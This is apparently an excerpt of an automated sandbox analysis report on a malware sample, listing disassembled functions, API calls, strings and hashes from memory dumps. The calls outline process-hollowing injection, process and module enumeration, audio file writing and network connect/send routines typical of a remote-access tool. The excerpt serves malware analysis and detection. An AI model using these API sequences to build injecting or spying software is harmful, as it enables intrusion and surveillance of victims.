                                                      • Instruction ID: 5be909808b2c791b30fd248b3dc9a17906ed3c56f507e88ea7362841a8f7e487
                                                      • Opcode Fuzzy Hash: 1359a8cf082caa1c927c381a975360f45f3e91d876403bd46293ad05b77c709f
                                                      • Instruction Fuzzy Hash: 9C012B71208744AFF715EF65DC5296F7BBDE749B14B718436F901D2640E6308D10D960
                                                      APIs
                                                      • GetVersionExA.KERNEL32(?,02C99106,00000000,02C9911E), ref: 02C7B712
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Version
                                                      • String ID:
                                                      • API String ID: 1889659487-0
                                                      • Opcode ID: c86065df92ea5deaef3a9cd9801da3fae004d1dea9c342e3d5e6e6a57debb425
                                                      • Instruction ID: f5c0093f235dcd150c90000acb63863d11b0e4bd6251b6ed083a505c5db06424
                                                      • Opcode Fuzzy Hash: c86065df92ea5deaef3a9cd9801da3fae004d1dea9c342e3d5e6e6a57debb425
                                                      • Instruction Fuzzy Hash: 94F034B4904702EFC350DF28D55AB1977F4FB88B04F418A28E898C7380E73A8825CF22
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EC4
                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EDC
                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89EEE
                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89F00
                                                      • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9,00000000,02C8A2A5), ref: 02C89F12
                                                      • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137,?,?,02C8A1C9), ref: 02C89F24
                                                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,02C8A137), ref: 02C89F36
                                                      • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 02C89F48
                                                      • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 02C89F5A
                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 02C89F6C
                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 02C89F7E
                                                      • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 02C89F90
                                                      • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 02C89FA2
                                                      • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 02C89FB4
                                                      • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 02C89FC6
                                                      • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 02C89FD8
                                                      • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 02C89FEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                      • API String ID: 667068680-597814768
                                                      • Opcode ID: e9ed0eb20c00e9439ec0cbc1e5b9f83da6a2bd7909dc3fc6cd79940bedd97960
                                                      • Instruction ID: 234139123e3211d573c47cf42381c4c3cff96fa62270c92887143a86b7a51549
                                                      • Opcode Fuzzy Hash: e9ed0eb20c00e9439ec0cbc1e5b9f83da6a2bd7909dc3fc6cd79940bedd97960
                                                      • Instruction Fuzzy Hash: 573182B0940720DFFB10BFB4D885F2637ADEB097087504A7AE512CF604D77699509F95
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 2D238136
                                                      • GetProcAddress.KERNEL32(00000000), ref: 2D238139
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 2D23814A
                                                      • GetProcAddress.KERNEL32(00000000), ref: 2D23814D
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 2D23815E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 2D238161
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 2D238172
                                                      • GetProcAddress.KERNEL32(00000000), ref: 2D238175
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 2D238217
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 2D23822F
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 2D238245
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 2D23826B
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 2D2382ED
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 2D238301
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 2D238341
                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 2D23840B
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 2D238428
                                                      • ResumeThread.KERNEL32(?), ref: 2D238435
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 2D23844C
                                                      • GetCurrentProcess.KERNEL32(?), ref: 2D238457
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 2D238472
                                                      • GetLastError.KERNEL32 ref: 2D23847A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                      • API String ID: 4188446516-3035715614
                                                      • Opcode ID: 93c20bdd9b708dd8224fe96ce53486a05cf83090c819dd3c6e38ecf4b8d624cd
                                                      • Instruction ID: c91296e66eb8c49641b6bf9225c8827b8739e8556576feef879266bc7e3d97c8
                                                      • Opcode Fuzzy Hash: 93c20bdd9b708dd8224fe96ce53486a05cf83090c819dd3c6e38ecf4b8d624cd
                                                      • Instruction Fuzzy Hash: A9A16CB0645301AFEB508F64CC89B6BBBF8FF48B08F104829F645E6291E775E904CB65
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C7D215
                                                        • Part of subcall function 02C7D1E0: GetProcAddress.KERNEL32(00000000), ref: 02C7D1F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                      • API String ID: 1646373207-1918263038
                                                      • Opcode ID: 1f1fe35d63c26b066e26eefb84499d8b4846c7f8138fbd509a739d54a445b634
                                                      • Instruction ID: e54f0da0645a298e28a9b894a34d5b5786310ba54090526bc116657d6f73f91c
                                                      • Opcode Fuzzy Hash: 1f1fe35d63c26b066e26eefb84499d8b4846c7f8138fbd509a739d54a445b634
                                                      • Instruction Fuzzy Hash: 5741B3E1A442064B1608AB6DB8014273BEEDF88765B60422FF006DBB00DF31BE419B7D
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 2D221AD9
                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 2D221B03
                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 2D221B13
                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 2D221B23
                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 2D221B33
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 2D221B43
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 2D221B54
                                                      • WriteFile.KERNEL32(00000000,2D292AAA,00000002,00000000,00000000), ref: 2D221B65
                                                      • WriteFile.KERNEL32(00000000,2D292AAC,00000004,00000000,00000000), ref: 2D221B75
                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 2D221B85
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 2D221B96
                                                      • WriteFile.KERNEL32(00000000,2D292AB6,00000002,00000000,00000000), ref: 2D221BA7
                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 2D221BB7
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 2D221BC7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Write$Create
                                                      • String ID: RIFF$WAVE$data$fmt
                                                      • API String ID: 1602526932-4212202414
                                                      • Opcode ID: dca53b1aafbfb89d3d7f0b912d3c03b7a0fd4f1ffd74d9058c88b7796c3b9e0c
                                                      • Instruction ID: e697680904826a646dad1d2ce3ba037e8831757c15e4a9987207db4f1e5050cf
                                                      • Opcode Fuzzy Hash: dca53b1aafbfb89d3d7f0b912d3c03b7a0fd4f1ffd74d9058c88b7796c3b9e0c
                                                      • Instruction Fuzzy Hash: 98417A725442087EE210CA51CC89FBBBFECEB89B54F40441AFA44E6181E765E909DBB3
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C86E56
                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E67
                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E77
                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E87
                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86E97
                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86EA7
                                                      • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects,00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 02C86EB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                      • API String ID: 667068680-2233174745
                                                      • Opcode ID: 9de4b6bc9186a22c456e0245e3b6ddf7f0f4a41cf1a7c900de4f6607464b56ed
                                                      • Instruction ID: 20f9019e755892ab9db5d47304ba65016d3f7a155e752cffbbd826d318c39dce
                                                      • Opcode Fuzzy Hash: 9de4b6bc9186a22c456e0245e3b6ddf7f0f4a41cf1a7c900de4f6607464b56ed
                                                      • Instruction Fuzzy Hash: F0F059B1AD4B51AFB3007F719E85B273F9E9B0470C3B09935741256902DFB9C9146F50
                                                      APIs
                                                      • connect.WS2_32(FFFFFFFF,?,?), ref: 2D2248E0
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 2D224A00
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 2D224A0E
                                                      • WSAGetLastError.WS2_32 ref: 2D224A21
                                                        • Part of subcall function 2D23B4EF: GetLocalTime.KERNEL32(00000000), ref: 2D23B509
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                      • String ID: Connection Failed: $Connection Refused$Pk)-N)-$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                      • API String ID: 994465650-355407551
                                                      • Opcode ID: 963b14f94ac446eae4a725530a40bff74c57428dc365279eb61595603b936d17
                                                      • Instruction ID: 2fd2714b5316b4949afe71ca7a89a7e96e111b2b17a950e9d727dd0d265f7908
                                                      • Opcode Fuzzy Hash: 963b14f94ac446eae4a725530a40bff74c57428dc365279eb61595603b936d17
                                                      • Instruction Fuzzy Hash: E3419F64AC49026BD7247B79CC6D93D7A5AEF32140F404138FA0177A92EF12B911C7E3
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 2D27130A
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D27051F
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D270531
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D270543
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D270555
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D270567
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D270579
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D27058B
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D27059D
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705AF
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705C1
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705D3
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705E5
                                                        • Part of subcall function 2D270502: _free.LIBCMT ref: 2D2705F7
                                                      • _free.LIBCMT ref: 2D2712FF
                                                        • Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
                                                        • Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA
                                                      • _free.LIBCMT ref: 2D271321
                                                      • _free.LIBCMT ref: 2D271336
                                                      • _free.LIBCMT ref: 2D271341
                                                      • _free.LIBCMT ref: 2D271363
                                                      • _free.LIBCMT ref: 2D271376
                                                      • _free.LIBCMT ref: 2D271384
                                                      • _free.LIBCMT ref: 2D27138F
                                                      • _free.LIBCMT ref: 2D2713C7
                                                      • _free.LIBCMT ref: 2D2713CE
                                                      • _free.LIBCMT ref: 2D2713EB
                                                      • _free.LIBCMT ref: 2D271403
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: dc5e764399070667ce7ef7ac2b595af4993422f196026a6e5c7093bdb6808819
                                                      • Instruction ID: 9f61ae34f5b566c8ffe4facf61902c72d5fc85238f1cec74bc035cb244203680
                                                      • Opcode Fuzzy Hash: dc5e764399070667ce7ef7ac2b595af4993422f196026a6e5c7093bdb6808819
                                                      • Instruction Fuzzy Hash: E9315E31684B129FEB229A39DC40B6A73F8EF00352F519579E568F6554DB30BE808BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                      • API String ID: 2030045667-32948583
                                                      • Opcode ID: e094a8a1570feeb5cfea54d261ba566cae89bd54c95985d64606c1bd350ff596
                                                      • Instruction ID: 111895228522ab5043f934133c2ee2c1878ecd264c5f4288a9a079b1f125bb2f
                                                      • Opcode Fuzzy Hash: e094a8a1570feeb5cfea54d261ba566cae89bd54c95985d64606c1bd350ff596
                                                      • Instruction Fuzzy Hash: 5BA1E470E042A48BDF21AA2CCC80BD9B7E5FB49354F1440E5DD49AB386CB758AC5CF92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                      • API String ID: 82841172-425784914
                                                      • Opcode ID: 30380484cb9b3efecb574092a05a21ac0341dce1c33fe198b242f69747669a8c
                                                      • Instruction ID: 69020bab1d50260018c5918dd60837872c48abeacbf8b00377be74fc3ac3f2e4
                                                      • Opcode Fuzzy Hash: 30380484cb9b3efecb574092a05a21ac0341dce1c33fe198b242f69747669a8c
                                                      • Instruction Fuzzy Hash: A54134720CC6109AD315DB60DC98CAFB3A8EFB0251F11453EB655F61A5FF20BA49C6A2
                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02C8A394
                                                      • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02C8A3AB
                                                      • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02C8A3B1
                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C8A43F
                                                      • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02C8A44B
                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02C8A45F
                                                      Strings
                                                      • C:\Windows\System32\KernelBase.dll, xrefs: 02C8A3A6
                                                      • LoadLibraryExA, xrefs: 02C8A3A1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Read$AddressHandleModuleProc
                                                      • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                      • API String ID: 1061262613-1650066521
                                                      • Opcode ID: 092ed908ca45a97bbb708290ae908102f5a616a6e1e3536d148182358926eba5
                                                      • Instruction ID: 97b898f4a3a7e8679542a2e9c72e991a8e3b57e9de1dafe426ca3e4e682e241a
                                                      • Opcode Fuzzy Hash: 092ed908ca45a97bbb708290ae908102f5a616a6e1e3536d148182358926eba5
                                                      • Instruction Fuzzy Hash: 95317471A40705BBDF20EF64CC85F5AB7ACAF44728F509625EA149B281D370EA50DBA4
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A892
                                                      • GetLastError.KERNEL32(?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A89F
                                                      • __dosmaperr.LIBCMT ref: 2D25A8A6
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A8D2
                                                      • GetLastError.KERNEL32(?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A8DC
                                                      • __dosmaperr.LIBCMT ref: 2D25A8E3
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,2D221D55,?), ref: 2D25A926
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A930
                                                      • __dosmaperr.LIBCMT ref: 2D25A937
                                                      • _free.LIBCMT ref: 2D25A943
                                                      • _free.LIBCMT ref: 2D25A94A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      • Opcode ID: 11934ec0e4c743f79af94ebf51fa01236b7b9bd185d2abf3ca454d284663c96f
                                                      • Instruction ID: 73add80539ff2b1cd7aeb1247a476f0b7e013ea4b3d6ac813c42c06f4e38490b
                                                      • Opcode Fuzzy Hash: 11934ec0e4c743f79af94ebf51fa01236b7b9bd185d2abf3ca454d284663c96f
                                                      • Instruction Fuzzy Hash: C731C07144C24AAFDF059FA48C49DAF3B78FF06264F1142A9FA1076290EB31ED45DBA0
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 2D2254BF
                                                      • GetMessageA.USER32 ref: 2D22556F
                                                      • TranslateMessage.USER32(?), ref: 2D22557E
                                                      • DispatchMessageA.USER32 ref: 2D225589
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,2D294F78), ref: 2D225641
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 2D225679
                                                        • Part of subcall function 2D224AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 2D224B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                      • API String ID: 2956720200-749203953
                                                      • Opcode ID: 6080d959f31a2b556c6f6c24c3064239b4880b54fa47cedb323eb26ae29b0e97
                                                      • Instruction ID: 07aff8f91c7897caa95901af939cb922aa379b8cec52c4073738d3a694174abc
                                                      • Opcode Fuzzy Hash: 6080d959f31a2b556c6f6c24c3064239b4880b54fa47cedb323eb26ae29b0e97
                                                      • Instruction Fuzzy Hash: AA41C2325887116BCB11EB74CC9C9AF37B9EFA6610F41452CB652A7290EF38A905C792
                                                      Strings
                                                      • Unexpected Memory Leak, xrefs: 02C728C0
                                                      • 7, xrefs: 02C726A1
                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C72849
                                                      • bytes: , xrefs: 02C7275D
                                                      • The unexpected small block leaks are:, xrefs: 02C72707
                                                      • An unexpected memory leak has occurred. , xrefs: 02C72690
                                                      • , xrefs: 02C72814
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                      • API String ID: 0-2723507874
                                                      • Opcode ID: 8d15d863bd25b1e0ccffd60af125c03f9a1de04462ea42adde6717aff8e186a4
